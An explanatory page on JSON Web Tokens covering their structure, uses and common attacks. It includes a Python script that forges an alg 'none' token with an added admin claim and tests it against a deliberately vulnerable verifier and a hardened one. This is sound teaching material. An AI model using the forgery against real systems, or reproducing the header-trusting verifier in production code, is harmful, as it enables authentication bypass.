JWTs (JSON Web Tokens) are central to authentication in distributed architectures such as modern web applications and microservices. A JWT has three parts: Header, Payload and Signature. The Header names the token type (JWT) and the signing algorithm, such as HMAC-SHA256 (HS256) or RSA (RS256). The Payload carries the claims: statements about an entity (typically the user) plus any additional data. The Signature lets the recipient verify that the token was not altered in transit and, for tokens signed with an asymmetric private key, that it was issued by the holder of that key; an HMAC signature shows only that the issuer knew the shared secret.
JWTs are used in authentication and authorisation mechanisms: the client exchanges credentials for a JWT and then includes that token in each request to the server. The server validates the token on every request, which verifies its authenticity and integrity. Non-repudiation is only possible with asymmetric signatures, since any party holding an HMAC secret can mint a valid token.
While JWTs are efficient and easy to implement, they must be handled securely to prevent well-known vulnerabilities such as the none-algorithm attack (the server is tricked into accepting a token whose header declares alg "none" and whose signature is empty), signature stripping, and disclosure of the signing key. Standard practice is to pin the algorithm(s) the verifier will accept rather than trusting the token's own header, use strong algorithms and keys (a guessable HMAC secret can be brute-forced offline from a single captured token), keep signing keys secret, validate the claims (expiry, issuer, audience) as well as the signature, and never store sensitive data in the payload, which is only base64url-encoded, not encrypted.
Despite these concerns, JWTs are widely adopted for their simplicity and robustness, forming the backbone of stateless authentication systems and serving as a widely trusted standard (RFC 7519) for exchanging signed claims between services.
Example of a JWT (three base64url-encoded segments separated by dots; this is the jwt.io sample token, signed with HS256): eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c (Try decoding this token with jwt.io)
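As an added example (not code from the original page), the following Python script, standard library only, decodes the token above, re-signs its payload, then builds the alg "none" forgery described earlier and runs it against two verifiers: a vulnerable one that lets the token header choose the algorithm, and a hardened one that pins HS256, compares the MAC in constant time and honours an exp claim. It assumes the token is the jwt.io sample signed with jwt.io's default secret "your-256-bit-secret"; the reissued_matches_sample result checks that assumption at run time. The function names and the added admin claim are the example's own.

```python
import base64
import hashlib
import hmac
import json
import time

# The token shown on this page (jwt.io's sample token). Assumption: it was
# signed with the secret jwt.io fills in by default, "your-256-bit-secret".
SAMPLE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
)
SAMPLE_SECRET = b"your-256-bit-secret"

def b64url_decode(segment):
    # JWT segments are base64url with the "=" padding stripped; restore it.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def split_token(token):
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token: expected header.payload.signature")
    return parts

def decode_unverified(token):
    """What jwt.io displays: header and payload with NO signature check.
    Fine for inspection, never for an access decision."""
    h, p, _ = split_token(token)
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))

def sign_hs256(payload, secret):
    """Issue a compact-serialised HS256 JWT, as the server does at login."""
    h = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    mac = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(mac)}"

def forge_none_token(token, extra_claims):
    """None-algorithm attack: reuse the victim's claims, add the attacker's,
    declare alg "none" and send an empty signature. No secret is needed."""
    _, payload = decode_unverified(token)
    payload.update(extra_claims)
    h = b64url_encode(b'{"alg":"none","typ":"JWT"}')
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h}.{p}."

def verify_trusting_header(token, secret):
    """VULNERABLE verifier: lets the token's own header pick the algorithm,
    so alg "none" bypasses the signature check entirely."""
    h, p, s = split_token(token)
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none":
        return json.loads(b64url_decode(p))  # signature never examined
    mac = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    if alg == "HS256" and hmac.compare_digest(mac, b64url_decode(s)):
        return json.loads(b64url_decode(p))
    raise ValueError("signature mismatch")

def verify_hs256(token, secret, now=None):
    """Hardened verifier: pins the algorithm the server expects, compares the
    MAC in constant time, and rejects an expired token when exp is present."""
    h, p, s = split_token(token)
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg != "HS256":
        raise ValueError(f"unexpected alg {alg!r}; only HS256 is accepted")
    mac = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(mac, b64url_decode(s)):
        raise ValueError("signature mismatch")
    payload = json.loads(b64url_decode(p))
    now = int(time.time()) if now is None else now
    if "exp" in payload and now >= int(payload["exp"]):
        raise ValueError("token expired")
    return payload

def accepts(verifier, token, secret):
    """True if the verifier returns a payload, False if it rejects the token."""
    try:
        verifier(token, secret)
        return True
    except ValueError:
        return False

def run_demo():
    """Re-sign the page's token, forge an alg "none" variant with an extra
    admin claim, and try it against both verifiers."""
    _, payload = decode_unverified(SAMPLE_TOKEN)
    forged = forge_none_token(SAMPLE_TOKEN, {"admin": True})
    return {
        "reissued_matches_sample": sign_hs256(payload, SAMPLE_SECRET) == SAMPLE_TOKEN,
        "vulnerable_accepts_forged": accepts(verify_trusting_header, forged, SAMPLE_SECRET),
        "hardened_accepts_forged": accepts(verify_hs256, forged, SAMPLE_SECRET),
        "hardened_accepts_sample": accepts(verify_hs256, SAMPLE_TOKEN, SAMPLE_SECRET),
    }

if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Run it as a script to see the two verifiers disagree on the forged token: the difference is entirely in whether the server or the token decides which algorithm is checked. A production verifier should additionally check iss and aud, and the same pinning rule applies to asymmetric algorithms, where a verifier that lets the header choose can also be talked into treating an RSA public key as an HMAC secret.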
- Compactness and URL-safe design
- Composed of a Header, Payload, and Signature
- Facilitates token-based authentication and secure data transfer
- Prone to security risks if not properly verified and handled
- Real-World Example: JWTs are used in Single Sign-On (SSO) services where a user logs in once, and the JWT issued is accepted by various other services or applications without requiring the user to log in again.
- Hypothetical Scenario: An IoT ecosystem enrols devices and uses a JWT per device to authenticate its API calls. The token is issued when a device first connects and registers its credentials with the central server, which then assigns the device a unique JWT to present on its subsequent communications.
- Token-based Authentication: A system that uses security tokens like JWTs to authenticate users instead of traditional session cookies.
- OAuth: An authorisation framework that often uses JWTs for securing API calls and delegating user authorisation.
- OpenID Connect: An authentication layer on top of OAuth 2.0 that uses a JWT (the ID Token) to authenticate the user and convey identity information to the client.
- Claims: Pieces of information asserted about a subject, such as user data, used in JWTs to carry the authenticated user’s properties.